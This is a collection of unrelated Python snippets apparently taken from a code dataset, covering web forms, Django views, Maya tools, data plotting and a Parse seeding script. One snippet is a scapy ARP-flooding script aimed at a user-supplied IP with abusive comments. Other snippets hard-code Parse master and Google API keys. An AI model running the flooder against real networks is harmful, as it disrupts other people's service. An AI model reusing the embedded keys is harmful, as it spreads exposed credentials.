    mapping = SelectField('Mapping', validators=[Optional()], coerce=NoneOrType(unicode))
    alias = NullableStringField('Alias', validators=[Optional(), Length(0, 50), Regexp(RULE_ALIAS_REGEXP)])
    product = NullableStringField('Product', validators=[Optional(), Length(0, 15)])
    version = NullableStringField('Version', validators=[Optional(), Length(0, 10)])
    buildID = NullableStringField('BuildID', validators=[Optional(), Length(0, 20)])
    channel = NullableStringField('Channel', validators=[Optional(), Length(0, 75)])
    locale = NullableStringField('Locale', validators=[Optional(), Length(0, 200)])
    distribution = NullableStringField('Distribution', validators=[Optional(), Length(0, 100)])
    buildTarget = NullableStringField('Build Target', validators=[Optional(), Length(0, 75)])
    osVersion = NullableStringField('OS Version', validators=[Optional(), Length(0, 1000)])
    distVersion = NullableStringField('Dist Version', validators=[Optional(), Length(0, 100)])
    whitelist = NullableStringField('Whitelist', validators=[Optional(), Length(0, 100)])
    comment = NullableStringField('Comment', validators=[Optional(), Length(0, 500)])
    update_type = SelectField('Update Type', choices=[('minor', 'minor'), ('major', 'major')], validators=[Optional()], coerce=NoneOrType(unicode))
    headerArchitecture = NullableStringField('Header Architecture', validators=[Optional(), Length(0, 10)])
class CompleteReleaseForm(Form):
    """Form carrying a complete release blob, uploaded as a JSON file."""
    name = StringField('Name', validators=[Required()])
    product = StringField('Product', validators=[Required()])
    blob = JSONStringField('Data', validators=[Required()], widget=FileInput())
    data_version = IntegerField('data_version', widget=HiddenInput())
|
993,440 | 26b6508f078ffdae3e558b4192d032f8247ae2d1 | class Solution(object):
def generateMatrix(self, n):
"""
:type n: int
:rtype: List[List[int]]
"""
if n == 0: return []
up, left = 0, 0
down, right = n - 1, n - 1
res = [[0 for i in range(n)] for j in range(n)]
direct,count = 0,0
while True: # Mistake for i in range(n*n):
if direct == 0:
for j in range(left, right+1):
count += 1; res[up][j] = count # Mistake count start from 1
up += 1
elif direct == 1:
for j in range(up, down+1):
count += 1;res[j][right] = count
right -= 1
elif direct == 2:
for j in range(right, left-1, -1):
count += 1;res[down][j] = count
down -= 1
elif direct == 3:
for j in range(down, up-1, -1):
count += 1;res[j][left] = count
left+=1
if up > down or left > right:
break
direct= (direct + 1) % 4
return res
# Quick demo: prints the 3x3 clockwise spiral [[1, 2, 3], [8, 9, 4], [7, 6, 5]].
s = Solution()
print(s.generateMatrix(3))
|
993,441 | f522229fb9b4265414fb64100f7b509f1d06c0ea | #!/usr/bin/python
# Days of Year
# Author: Thomas Perl
import datetime
today = datetime.datetime.now()
# %j is the zero-padded day of the year (001-366); int() drops the padding.
day_of_year = int(today.strftime('%j'))
print day_of_year
|
993,442 | 9744527ba91b6277206419a2d9e124ae628b8611 | from multiprocessing import Queue
class BufferManager:
    """Pairs two multiprocessing queues: percepts flowing in and actions
    flowing out. Reads are non-blocking and return None when nothing is
    available; writes are blocking puts."""

    def __init__(self):
        self.percept_buffer = Queue()
        self.action_buffer = Queue()

    def read_percept(self):
        """Return the next percept, or None if the queue is empty."""
        from queue import Empty  # local import: keeps module imports unchanged
        # Fix: the original checked empty() and then called a *blocking*
        # get(True); another consumer draining the queue between the check
        # and the get could block this call forever. get_nowait() is atomic.
        try:
            return self.percept_buffer.get_nowait()
        except Empty:
            return None

    def write_percept(self, percept):
        """Enqueue a percept (blocking put)."""
        self.percept_buffer.put(percept, True)

    def read_action(self):
        """Return the next action, or None if the queue is empty."""
        from queue import Empty
        try:
            return self.action_buffer.get_nowait()
        except Empty:
            return None

    def write_action(self, action):
        """Enqueue an action (blocking put)."""
        self.action_buffer.put(action, True)
|
993,443 | 08ef47ea1c063b7e30c1c158d7ceb9bd06ee00e9 | '''
Author:
Aaron Aikman
Date of Creation:
11/21/2017
Installation:
Put in scripts folder
Enter 'rehash' in the mel command line
Put the Shelf Button script into a python button
Shelf Button:
import AAikman_AddAttrToSel as aaAddAttrs
reload(aaAddAttrs)
aaAddAttrs.main()
Marking Menu Script:
python("import AAikman_AddAttrToSel as aaAddAttrs; reload(aaAddAttrs); aaAddAttrs.main();")
'''
import maya.cmds as cmds
def main():
    """Add the three ControlVis_* keyable float attributes (0-1, default 1)
    to every currently selected Maya node."""
    sel = cmds.ls(sl=True)
    for itm in sel:
        # Select each item in turn; addAttr presumably acts on the current
        # selection when no node is passed -- confirm against Maya cmds docs.
        cmds.select(itm, r=True)
        # cmds.addAttr( longName='ArmorUp', attributeType='float', k=True, minValue=0, maxValue=10, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_SideL', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_SideR', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_Visor3', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_Visor2', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_Visor1', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_JawUpper', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        # cmds.addAttr( longName='ArmorUp_JawLower', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=0)
        cmds.addAttr( longName='ControlVis_Armor', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=1)
        cmds.addAttr( longName='ControlVis_Propulsion', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=1)
        cmds.addAttr( longName='ControlVis_Grapple', attributeType='float', k=True, minValue=0, maxValue=1, defaultValue=1)
|
993,444 | cf6b400f0873ba8e41dd3adda3ac3b677fa4744e | import os
import sys
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import seaborn as sns
from datetime import datetime
# === Day 2: load the three tree sensor logs and plot tree 1's readings.

def _load_tree_frame(loc):
    """Read one sensor CSV, drop the date column, and coerce every remaining
    column to numeric (unparseable readings become NaN).

    Returns (raw_dataframe, cleaned_numeric_dataframe)."""
    raw = pd.read_csv(loc)
    frame = pd.DataFrame(raw, columns=raw.columns.values)
    frame.drop('date', axis=1, inplace=True)
    return raw, frame.apply(pd.to_numeric, errors='coerce')

_day2_dir = os.path.join(os.getcwd(), 'hft_group_project/datasets/day2')
tree1_loc = os.path.join(_day2_dir, '25.csv')
tree2_loc = os.path.join(_day2_dir, '130.csv')
tree3_loc = os.path.join(_day2_dir, '300.csv')
# The same load/clean pipeline was previously copy-pasted three times.
tree1_data, tree1 = _load_tree_frame(tree1_loc)
tree2_data, tree2 = _load_tree_frame(tree2_loc)
tree3_data, tree3 = _load_tree_frame(tree3_loc)

# calc avg of every column
tree1_mean = tree1.mean(axis=0)
tree2_mean = tree2.mean(axis=0)
tree3_mean = tree3.mean(axis=0)

f1 = plt.figure(figsize=(18, 16))
f1.suptitle("Tree with diameter 20-30cm", fontsize=14)
plt.style.use('ggplot')

def _line_subplot(position, series, title, xlabel):
    """Plot one sensor series as a line chart in the given subplot slot."""
    axis = plt.subplot(position)
    plt.plot(series)
    axis.set_title(title)
    plt.xlabel(xlabel)
    plt.ylabel('value')
    return axis

# tree 1: bar chart of averages plus one line chart per sensor.
plot1 = plt.subplot(231)
tree1_mean.plot.bar(rot=0)
plot1.set_title('Averages')
plot2 = _line_subplot(232, tree1["temperature"], 'temperature', 'data measurement points')
plot3 = _line_subplot(233, tree1["humidity"], 'humidity', 'data measurement points')
plot4 = _line_subplot(234, tree1["light"], 'light', 'data measurement points')
plot5 = _line_subplot(235, tree1["soil"], 'soil moisture', 'data measurement points')
plot6 = _line_subplot(236, tree1["air"], 'air quality', 'data measurement point')

# (Commented-out bar charts for trees 2/3 and the water/studio sensor were
# removed; recover them from version control if needed.)
plt.show()
|
993,445 | 10ba373c3cef3bf516c0ecb8425522596719845a | from django import forms
from django.conf import settings
from django.http import HttpResponse, HttpResponseRedirect, Http404
from homepage.models import *
from manager import models as mmod
from . import templater
from datetime import datetime
def process_request(request):
    '''Sends an employee to the form for updating labor information on a repair'''
    # Only authenticated staff may record repair work.
    if not request.user.is_authenticated():
        return HttpResponseRedirect('/homepage/')
    if not request.user.is_staff:
        # Fix: this returned HttpResponse('/homepage/') -- a 200 page whose
        # body was the literal URL string -- instead of redirecting.
        return HttpResponseRedirect('/homepage/')
    # Gets the user BO
    user = request.user
    sr = mmod.ServiceRepair.objects.get(id=request.urlparams[0])
    form = RepairWorkForm()
    now = datetime.now()
    if request.method == 'POST':
        form = RepairWorkForm(request.POST)
        if form.is_valid():
            work_performed = form.cleaned_data['work_performed']
            status = form.cleaned_data['status']
            hours_worked = form.cleaned_data['hours_worked']
            # charge_amount = form.cleaned_data['charge_amount']
            # NOTE(review): work_performed is collected but never stored on
            # the ServiceRepair -- confirm whether it should be persisted.
            if status == 'Finished':
                sr.dateComplete = now
            sr.status = status
            sr.labor_hours += hours_worked
            sr.save()
            return HttpResponseRedirect('/manager/repair_details/')
    template_vars = {
        'user': user,
        'sr': sr,
        'form': form,
    }
    return templater.render_to_response(request, 'repair_work.html', template_vars)
class RepairWorkForm(forms.Form):
    '''The repair work form is used for employees to describe the labor performed during a repair'''
    status = forms.ChoiceField(widget = forms.Select(), choices = ([('Waiting for Parts','Waiting for Parts'), ('On Hold','On Hold'),('In Progress','In Progress'),('Finished','Finished'), ]))
    # Whole hours only; added to ServiceRepair.labor_hours by the view.
    hours_worked = forms.IntegerField()
    work_performed = forms.CharField(required=False, label='', widget=forms.Textarea(attrs={'id':'laborBox','placeholder':'Description of labor performed'}))
993,446 | 98d9b1ac46a2438e60a4e030c8fd8350563d24b0 | from scapy.all import *
from threading import Thread
import time
import sys
def generate_packets(dst_addr):
    """Build a single ARP who-has request (op=1) for *dst_addr*."""
    #ARP(op=2, pdst=dest_IP, psrc=spoof_IP, hwsrc=hwsrc)
    pkt = ARP(op=1, pdst=dst_addr)
    return pkt
def flood_packet(dst_addr, timeout=100):
    """Send ARP requests to *dst_addr* in a tight loop for *timeout* seconds."""
    print(dst_addr)
    start_time = time.time()
    while time.time() - start_time < timeout:
        pkt = generate_packets(dst_addr)
        # NOTE(review): sendp() is the layer-2 send but the packet has no
        # explicit Ether layer -- confirm this is intended.
        sendp(pkt, verbose=False)
def start_attack(dst_addr):
    """Run flood_packet against *dst_addr* on a background thread."""
    try:
        #print(type(dst_addr))
        thread = Thread(target=flood_packet, args=(dst_addr,100))
        thread.start()
    except Exception as ex:
        print(ex)
if __name__ == "__main__":
    # Fix: the original tested len(sys.argv) < 1, which is never true
    # (argv always contains the script name), so a missing argument fell
    # through and sys.argv[1] raised IndexError instead of showing usage.
    if len(sys.argv) < 2:
        print('Enter the IP of the fucker you wanna spam')
        exit(0)
    else:
        try:
            dst_addr = str(sys.argv[1])
            print(f'Spamming {dst_addr} fucker')
            start_attack(dst_addr)
        except Exception as ex:
            print(ex)
def sumAll(n):
    """Return 0 + 1 + ... + n, counting up one step at a time.

    For negative n the loop never runs and 0 is returned.
    """
    total = 0
    current = 0
    while current <= n:
        total += current
        current += 1
    return total
993,448 | 507d1d55b646bfed9194f1bdb301a025897004d9 | #!/bin/python
#Filename=using_file.py
# Python 2 file I/O demo using the file() builtin (removed in Python 3).
poem='''\
Programming is fun
When the work is done
if you wanna make your work also fun:
use Python!
and funk
'''
#peng=file('test.txt','w') # if file no exist and it will creat new file
f=file('poem.txt','a') # open for appending ('a'): writes go to the end of the file
f.write(poem) # write the poem text to the end of the file
f.writelines("so ga ba ge")
f.close() # close the file
f=file('poem.txt')
#if no mode is specified, 'r'ead mode is assumed by default
while True:
    line=f.readline()
    #line=f.read(3)
    if len(line) == 0:
        break
    print line, # readline keeps the trailing newline; the comma stops print adding another
    # Notice comma to avoid automatic newline added by Python
f.close() # close the file
993,449 | b6a82100dcf8f622a2bcc23c3990043a7730d9af | from django import forms
from .models import *
from django.core.exceptions import ValidationError
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.contrib.auth import get_user_model
from django.forms import modelformset_factory
class CustomUserCreationForm(forms.Form):
    """Registration form that validates username/email uniqueness and that
    the two password entries match, then creates the user."""
    username = forms.CharField(label='Enter Username', min_length=4, max_length=150)
    email = forms.EmailField(label='Enter email')
    password1 = forms.CharField(label='Enter password', widget=forms.PasswordInput)
    password2 = forms.CharField(label='Confirm password', widget=forms.PasswordInput)
    def clean_username(self):
        """Lower-case the username and reject it if already taken."""
        User = get_user_model()
        username = self.cleaned_data['username'].lower()
        r = User.objects.filter(username=username)
        if r.count():
            raise ValidationError("Username already exists")
        return username
    def clean_email(self):
        """Lower-case the email and reject it if already registered."""
        User = get_user_model()
        email = self.cleaned_data['email'].lower()
        r = User.objects.filter(email=email)
        if r.count():
            raise ValidationError("Email already exists")
        return email
    def clean_password2(self):
        """Ensure both password fields contain the same value."""
        password1 = self.cleaned_data.get('password1')
        password2 = self.cleaned_data.get('password2')
        if password1 and password2 and password1 != password2:
            raise ValidationError("Password don't match")
        return password2
    def save(self, commit=True):
        """Create and return the new user.

        NOTE(review): `commit` is accepted but ignored -- create_user always
        persists the user. Confirm whether commit=False should be honored.
        """
        User = get_user_model()
        user = User.objects.create_user(
            self.cleaned_data['username'],
            self.cleaned_data['email'],
            self.cleaned_data['password1']
        )
        return user
# --- Application model forms -------------------------------------------------
# One ModelForm per applicant-profile section; each modelformset_factory
# builds the repeatable rows used on the multi-section application page.
# The owning foreign key (faculty / Applicant / uploaded_by) is excluded,
# presumably attached in the view -- confirm.
class ApplyForm(forms.ModelForm):
    class Meta:
        model = ApplyPositions
        fields = ('__all__')
class PersonalForm(forms.ModelForm):
    class Meta:
        User = get_user_model()
        model = User
        fields = ('__all__')
class EducationalForm(forms.ModelForm):
    class Meta:
        model = Course
        fields = ('__all__')
        exclude = ('Applicant',)
EducationalFormSet = modelformset_factory(Course, form=EducationalForm, extra=2)
class IndustrialForm(forms.ModelForm):
    class Meta:
        model = IndustrialExperience
        fields = ('__all__')
        exclude = ('faculty',)
IndustrialFormSet = modelformset_factory(IndustrialExperience, form=IndustrialForm, extra=1)
class TeachingForm(forms.ModelForm):
    class Meta:
        model = TeachingExperience
        fields = ('__all__')
        exclude = ('faculty',)
TeachingFormSet = modelformset_factory(TeachingExperience, form=TeachingForm, extra=1)
class ResearchForm(forms.ModelForm):
    class Meta:
        model = Research
        fields = ('__all__')
        exclude = ('faculty',)
ResearchFormSet = modelformset_factory(Research, form=ResearchForm, extra=1)
class MembershipForm(forms.ModelForm):
    class Meta:
        model = Membership
        fields = ('__all__')
        exclude = ('faculty',)
MembershipFormSet = modelformset_factory(Membership, form=MembershipForm, extra=1)
class ConferenceForm(forms.ModelForm):
    class Meta:
        model = Conference
        fields = ('__all__')
        exclude = ('faculty',)
ConferenceFormSet = modelformset_factory(Conference, form=ConferenceForm, extra=1)
class AwardForm(forms.ModelForm):
    class Meta:
        model = Awards
        fields = ('__all__')
        exclude = ('faculty',)
class ReferenceForm(forms.ModelForm):
    class Meta:
        model = Referral
        fields = ('__all__')
        exclude = ('faculty',)
ReferenceFormSet = modelformset_factory(Referral, form=ReferenceForm, extra=1)
class AchievementForm(forms.ModelForm):
    class Meta:
        model = SpecialAchievement
        fields = ('__all__')
        exclude = ('faculty',)
AchievementFormSet = modelformset_factory(SpecialAchievement, form=AchievementForm, extra=1)
class PayementForm(forms.ModelForm):
    class Meta:
        User = get_user_model()
        model = User
        fields = ('__all__')
class DocumentsForm(forms.ModelForm):
    class Meta:
        model = DocumentUpload
        fields = ('__all__')
        exclude = ('uploaded_by',)
DocumentsFormSet = modelformset_factory(DocumentUpload, form=DocumentsForm, extra=1)
class DeclarationForm(forms.ModelForm):
    class Meta:
        model = Declaration
        fields = ('__all__')
        exclude = ('faculty',)
993,450 | c4b8028af65097671723489df5274aa40bcc33a9 | #!/usr/bin/env python3
# seekf.py - seek and modify file
import sys
# Require exactly three positional arguments: filename, color, shade.
if (len(sys.argv) < 4):
    sys.stderr.write("Usage: seekf.py filename color shade\n")
    # NOTE(review): exit() is the interactive-site helper; sys.exit(1) is the
    # portable spelling (exit is absent under `python -S`) — confirm and switch.
    exit(1)
# your code here...
###############################################
#
# $ seekf.py colors yellow 6.6
#
# $ readf.py colors
# blue 4.4
# indigo 2.3
# yellow 6.6
# green 3.6
# violet 4.7
# orange 1.2
# red 6.2
#
|
993,451 | ee47cdf94ba6a9169ce8107b52e14c955237cc07 | from django.shortcuts import render
from django.contrib.auth.models import User
def main(request):
    """Render the landing page with an empty template context."""
    context = {}
    return render(request, 'main.html', context)
993,452 | e0ce356b3dabb392f44420594564a0d1e657fb95 | #############################
# #
# Alexander Chick #
# #
# copyright 2015 #
# #
#############################
"""
This program creates 50 * 50 = 2500 test interaction objects
in the "zE0001R1" table in Parse.
Data members for each Round 1 interaction object:
- interaction (int from 1 to 2500)
- subround (int from 1 to 50)
- station (int from 1 to 50)
- iPad_objectId (a string? pointer?)
- m_objectId (a string? pointer?)
- f_objectId (a string? pointer?)
- m_playerNum (int)
- f_playerNum (int)
- m_firstName (string)
- f_firstName (string)
- question_objectId (a string? pointer?)
- m_answer (string? or int of array position 0-3? or array of [int, string]?)
- f_answer (string? or int of array position 0-3?)
- is_same_answer (boolean) (will be filled in by play_zE0001R1.py)
- m_see_f_again (string or int 1-4?)
- f_see_m_again (string or int 1-4?)
- total_see_again (int, sum of see again ints, so possible values are 2-8)
- m_next_station (int)
- f_next_station (int, current + 1)
- ACL (will work on this later)
I'm going to start by just using strings
to reference objectId's,
and I'll figure out later if it'll be
better or more helpful to use pointers.
I'm also going to try to use ParsePy,
which I *think* is meant to make it easier
to interact with Parse in Python.
Eventually, I can put the code in these files into functions,
and have a simulate_zE0001 function to simulate a game
being set up, played, and analyzed.
The ParsePy docs are at
https://github.com/dgrtwo/ParsePy.
**************************************************
Here's the order of everything:
1. Get (query) all "zE0001_User" objects (the people at the event)
- all_users_at_event is an array containing the objects
- create all_males_at_event, all_females_at_event too
- use ParsePy / parse_rest
- (should I use the Parse "count" function?)
- a Query returns a "QuerySet" of objects.
- QuerySets are like lists, but you can't operate on them:
(AttributeError: 'Queryset' object has no attribute 'insert'),
so I cast each QuerySet as a list.
- an object's attributes are accessed like this: > object.attribute
For example, to get the username of playerNum = 1: > all_users_at_event[0].username
2. Get (query) the correct iPads / "IPad" objects for the event (right now, get all 100)
- all_ipads_at_event is an array containing the objects
3. Get (query) the correct questions / "Question" objects for the event (right now, get all 100)
- all_questions_at_event is an array containing the objects
4. Create the interaction / zE####R1 objects, store them in an array,
create a ParseBatcher, and upload the objects by calling batch_save
on the batcher, passing the array as an argument.
- The Parse batch upload limit is 50, so this has to be
in some kind of loop.
- Use counters, formatted like: interaction_counter, subround_counter
**************************************************
"""
# import stuff
import math
import os
import random
import sqlite3
import time
import json, httplib, urllib # parse stuff
from pprint import pprint # pretty printing
from parse_rest.connection import ParseBatcher, register, SessionToken
from parse_rest.datatypes import ACL, Function, Object
from parse_rest.role import Role
from parse_rest.user import User
# start program timer
program_start_time = time.time()
# Calling "register" allows parse_rest / ParsePy to work.
# - register(APPLICATION_ID, REST_API_KEY, optional MASTER_KEY)
register("AKJFNWcTcG6MUeMt1DAsMxjwU62IJPJ8agbwJZDJ",
"i8o0t6wg9GOTly0yaApY2c1zZNMvOqNhoWNuzHUS",
master_key = "LbaxSV6u64DRUKxdtQphpYQ7kiaopBaRMY1PgCsv"
)
# get correct event object from Parse;
# have to subclass Object before using Event.Query
class Event(Object):
pass
event_object = list(Event.Query.get(eventNumber = 1))
# (do I need to make this a list?)
##################################################
""" _______________________________________________
1. Get (query) all "zE0001_User" objects (the people at the event)
- all_users_at_event is an array containing the objects
- create all_males_at_event, all_females_at_event too
- use ParsePy / parse_rest
- (should I use the Parse "count" function?)
- a Query returns a "QuerySet" of objects.
- QuerySets are like lists, but you can't operate on them:
(AttributeError: 'Queryset' object has no attribute 'insert'),
so I cast each QuerySet as a list.
- an object's attributes are accessed like this: > object.attribute
For example, to get the username of playerNum = 1: > all_users_at_event[0].username
_______________________________________________
----------------------------------------------- """
def get_eventUserClassName(event_number):
    """Return the Parse user class name for an event, e.g. 7 -> 'zE0007_User'.

    The integer event number is zero-padded to four digits, replacing the
    original if/elif ladder that built the padding by hand.

    Raises:
        ValueError: if event_number is not in the range 1..9999.
    """
    if not 0 < event_number < 10000:
        raise ValueError("The event number must be between 1 and 9999.")
    # {:04d} left-pads with zeros to width 4 (works on Python 2 and 3).
    return "zE{:04d}_User".format(event_number)
# set the class name of the event users we're querying
#eventUserClassName = "zE0001_User"
eventUserClassName = get_eventUserClassName(event_object.eventNumber)
# (The event number can be retrieved / set by querying "Config";
# I'll add this functionality later.)
# make it a subclass of Object
eventUserClass = Object.factory(eventUserClassName)
# Queries return with a format of [object, object, object, ...]
# and an object's attributes are accessed like this:
# object.attribute
# For example, to get the username of playerNum = 1:
# all_users_at_event[0].username
# run the query (all users at event)
all_users_at_event = list(eventUserClass.Query.all().order_by("playerNum"))
# run the query (all males at event)
all_males_at_event = list(eventUserClass.Query.all().filter(sex='M').order_by("playerNum"))
# run the query (all females at event)
all_females_at_event = list(eventUserClass.Query.all().filter(sex='F').order_by("playerNum"))
# run the query (all ghosts at event)
all_ghosts_at_event = list(eventUserClass.Query.all().filter(sex='G').order_by("playerNum"))
# print the results of the queries
print "\n\n{} of the {} people who registered for this event are here.\n".format(len(all_users_at_event), event_object.numPeople)
print "\n\n{} of the {} men are here.\n".format(len(all_males_at_event), event_object.numMen)
print "\n\n{} of the {} women are here.\n".format(len(all_females_at_event), event_object.numWomen)
print "\n\n{} \"ghosts\" are being provided.\n".format(len(all_ghosts_at_event))
print "\n\n{} iPads and {} iPad stations are required for this event.".format(event_object.numIPads, event_object.numStations)
""" _______________________________________________
2. Get (query) the correct iPads / "IPad" objects for the event (right now, get all 100)
- all_ipads_at_event is an array containing the objects
_______________________________________________
----------------------------------------------- """
# make IPad a subclass of Object
class IPad(Object):
pass
# run the query
all_ipads_at_event = list(IPad.Query.all().order_by("iPad_Id"))
""" _______________________________________________
3. Get (query) the correct questions / "Question" objects for the event (right now, get all 100)
- all_questions_at_event is an array containing the objects
_______________________________________________
----------------------------------------------- """
# make Question a subclass of Object
class Question(Object):
pass
# run the query
all_questions_at_event = list(Question.Query.all().order_by("questionNum"))
""" _______________________________________________
4. Create the interaction / zE####R1 objects, store them in an array,
create a ParseBatcher, and upload the objects by calling batch_save
on the batcher, passing the array as an argument.
- The Parse batch upload limit is 50, so this has to be
in some kind of loop.
- Use counters.
_______________________________________________
----------------------------------------------- """
# set the class name of the round for which we're creating interactions (zE####R1)
eventRoundClassName = eventUserClassName[:6] + "R1"
# make it a subclass of Object
eventRoundClass = Object.factory(eventRoundClassName)
# # set the class's ACL - doesn't work right now
# zE0001R1.ACL.set_default(read = False, write = False)
# initiate counters
interaction_counter = 0
# initialize the list of stations [1, 2, 3, ..., 50]
station_list = list(x+1 for x in range(50))
batch_uploading_start_time = time.time()
# Default the pause/resume timestamps so the timing summary printed after the
# loop cannot raise NameError when the rate-limit sleep below never triggers.
# With both equal, "time spent sleeping" correctly comes out as zero.
pause_time = resume_time = batch_uploading_start_time
# iterate through the subrounds -- i.e. subround 1 contains interactions 1-50, etc.
for subround in range(50):
    # Objects created for this subround, saved in a single batch request
    # (Parse's batch upload limit is 50 objects).
    interactions_list_to_be_saved = []
    # create the 50 interactions of this subround
    for i in range(50):
        interaction_counter += 1
        interaction = eventRoundClass(
            interaction = interaction_counter,
            subround = subround + 1,
            station = station_list[i],
            inner_iPad_objectId = all_ipads_at_event[i].objectId,
            outer_iPad_objectId = all_ipads_at_event[i+50].objectId,
            m_thisEvent_objectId = all_males_at_event[i].objectId,
            f_thisEvent_objectId = all_females_at_event[i].objectId,
            m_user_objectId = all_males_at_event[i].user_objectId,
            f_user_objectId = all_females_at_event[i].user_objectId,
            m_playerNum = all_males_at_event[i].playerNum,
            f_playerNum = all_females_at_event[i].playerNum,
            m_firstName = all_males_at_event[i].username,
            f_firstName = all_females_at_event[i].username,
            question_objectId = all_questions_at_event[i].objectId,
            # m_answer / f_answer / is_same_answer / m_see_f_again /
            # f_see_m_again / total_see_again are filled in later by
            # play_zE0001R1.py, so they are not set at creation time.
            # Men advance to the next station up (50 wraps to 1); women move
            # down (1 wraps to 50).  The original line here was a syntax
            # error: "(station_list[i] + 1) % 50 if station_list[i] != )".
            m_next_station = ( (station_list[i] + 1) if station_list[i] < 50 else 1 ),
            f_next_station = ( (station_list[i] - 1) if station_list[i] > 1 else 50 )
        )
        interactions_list_to_be_saved.append(interaction)
    # Throttle to stay under Parse's free-tier limit of 1800 requests/minute:
    # once 1800+ creates have been issued inside the current minute, sleep
    # out the remainder of that minute before continuing.
    time_uploading_before_sleep = time.time() - batch_uploading_start_time
    if (time_uploading_before_sleep < 60) and (interaction_counter > 1799):
        print("\nSleeping for {} seconds.".format(round((60 - time_uploading_before_sleep), 3)))
        pause_time = time.time()
        time.sleep(60 - time_uploading_before_sleep)
        print("\nUploading will now resume.\n")
        resume_time = time.time()
    # save these 50 interactions to Parse
    batcher = ParseBatcher()
    batcher.batch_save(interactions_list_to_be_saved)
    print("batch " + str(subround + 1) + " of 50 has been saved.")
    # Rotate the pairing lists for the next subround.  ParsePy querysets do
    # not support slicing ("Slice is not supported for now."), hence the
    # insert/pop/append dance instead of slice arithmetic.
    # males: take the last, put in front (men move toward increasing stations)
    all_males_at_event.insert(0, all_males_at_event[-1])
    all_males_at_event.pop(-1)  # default is -1, kept explicit for clarity
    # females: take the first, put in back (women move toward decreasing stations)
    all_females_at_event.append(all_females_at_event[0])
    all_females_at_event.pop(0)
    # iPads stay with their stations; questions advance by two per subround
    all_questions_at_event.append(all_questions_at_event[0])
    all_questions_at_event.append(all_questions_at_event[1])
    all_questions_at_event.pop(0)
    all_questions_at_event.pop(0)
# rotate lists (with slicing)
# (ParsePy doesn't support slicing lists of objects yet)
# # males: take the first, put in back
# all_males_at_event = all_males_at_event[1:] + [all_males_at_event[0]]
# # females: take the last, put in front
# all_females_at_event = [all_females_at_event[-1]] + all_females_at_event[:-1]
# # questions: take the first two, put in back
# all_questions_at_event = all_questions_at_event[2:] + all_questions_at_event[:2]
program_end_time = time.time()
print "\nAll batches saved."
# Timing tests
print "\nTime spent uploading: {} seconds.".format(round((pause_time - program_start_time) + (program_end_time - resume_time), 3))
print "\nTime spent sleeping: {} seconds.".format(round((resume_time - pause_time), 3))
print "\nTotal time of program: {} seconds.\n".format(round((program_end_time - program_start_time), 3))
"""
TESTS
******
From laptop, at home:
Time spent uploading: 19.552 seconds.
Time spent sleeping: 48.067 seconds.
Total time of program: 67.618 seconds.
Time spent uploading: 18.309 seconds.
Time spent sleeping: 47.767 seconds.
Total time of program: 66.076 seconds.
Time spent uploading: 19.194 seconds.
Time spent sleeping: 47.814 seconds.
Total time of program: 67.008 seconds.
******
From laptop, at Dana Farber:
Time spent uploading: 32.592 seconds.
Time spent sleeping: 38.232 seconds.
Total time of program: 70.824 seconds.
"""
|
993,453 | 19f5243ff43c20beed65a4c11871c6f7d8500185 | from flask import Flask, request, render_template
import requests
import json
app = Flask(__name__)
# NOTE(review): debug mode enables the interactive debugger and reloader;
# it must not be left enabled in a production deployment.
app.debug = True
@app.route('/')
def hello_world():
    """Index route; returns a plain greeting string."""
    return 'Hello World!'
@app.route('/search_form')
def search_form():
    """Serve the search form page."""
    return render_template("search_form.html")
@app.route('/search_info')
def view_search_info():
    """Run a Google Custom Search for the ?term= query arg and render results.

    Renders search_results.html with the API response's 'searchInformation'
    block and the original search term.
    """
    term = request.args.get('term')
    base_url = "https://www.googleapis.com/customsearch/v1"
    # Pass the term as the 'q' parameter so requests URL-encodes it, instead
    # of concatenating it unencoded into the URL and also sending a duplicate,
    # unused 'term' parameter as the original code did.
    # SECURITY(review): the API key is hard-coded here; move it to an
    # environment variable or config file before deploying.
    params = {
        "key": "AIzaSyAZIzd9d4j2uBEqkNgM5a7LSmShu1dOc8A",
        "cx": "017576662512468239146:omuauf_lfve",
        "q": term,
    }
    resp = requests.get(base_url, params=params)
    python_obj = json.loads(resp.text)
    print(python_obj)
    return render_template("search_results.html", object=python_obj['searchInformation'], term=term)
if __name__ == '__main__':
app.run() |
993,454 | dfddd7f26d630601cab680f54089ce7a36ec4484 | # stuff for managing the "tmp" temporary directory
import os
import shutil
def reset():
    """Recreate the 'tmp' scratch directory as a fresh, empty directory."""
    tmp_dir = 'tmp'
    # Wipe any previous contents before starting over.
    if os.path.exists(tmp_dir):
        shutil.rmtree(tmp_dir)
    os.makedirs(tmp_dir)
|
993,455 | cc3d34596a5a32e60fa32b406d82b7b406d37833 | from typing import Optional, List, Tuple, IO
import numpy as np
import pickle
class TradingPopulation:
    """Genetic-algorithm population of TradingIndividual strategies.

    Each generation keeps the fittest 10%, adds 30% mutants and 20%
    crossovers bred from the keepers, and refills the remainder with
    fresh random individuals.
    """

    def __init__(self, input_shape: Tuple[int, int], starting_balance: float, num_individuals: int,
                 mutation_chance_genome=.1, mutation_magnitude=.15, crossover_chance_genome=.5):
        self.__num_individuals = num_individuals
        # NOTE(review): tracked but never assigned anywhere in this class.
        self.__best_individual: Optional[TradingIndividual] = None
        self.__contained_individuals: List[TradingIndividual] = []
        self.__input_shape = input_shape
        self.__starting_balance = starting_balance
        self.__mutation_chance = mutation_chance_genome
        self.__mutation_magnitude = mutation_magnitude
        self.__crossover_chance = crossover_chance_genome

    def save(self, file_name: str):
        """Serialize the population: a text count line, the pickled input
        shape, then each individual's matrices in order."""
        with open(file_name, 'wb') as open_handle:
            open_handle.write(str(self.__num_individuals).encode(encoding="UTF8") + b'\n')
            pickle.dump(self.__input_shape, open_handle)
            for individual in self.__contained_individuals:
                individual.save(open_handle)

    def load(self, file_name: str):
